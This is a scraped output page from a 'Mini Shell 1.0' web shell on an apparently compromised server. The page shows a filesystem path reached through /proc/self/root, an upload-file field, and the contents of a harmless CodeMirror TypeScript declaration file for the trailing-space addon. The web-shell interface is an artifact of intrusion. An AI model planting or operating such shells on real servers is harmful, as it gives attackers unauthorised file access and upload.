HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/share/node_modules/@types/codemirror/addon/edit/
Upload File :
Current File : //proc/self/root/usr/share/node_modules/@types/codemirror/addon/edit/trailingspace.d.ts
import '../../';

declare module '../../' {
    interface EditorConfiguration {
        /** when enabled, adds the CSS class cm-trailingspace to stretches of whitespace at the end of lines. */
         showTrailingSpace?: boolean | undefined;
    }
}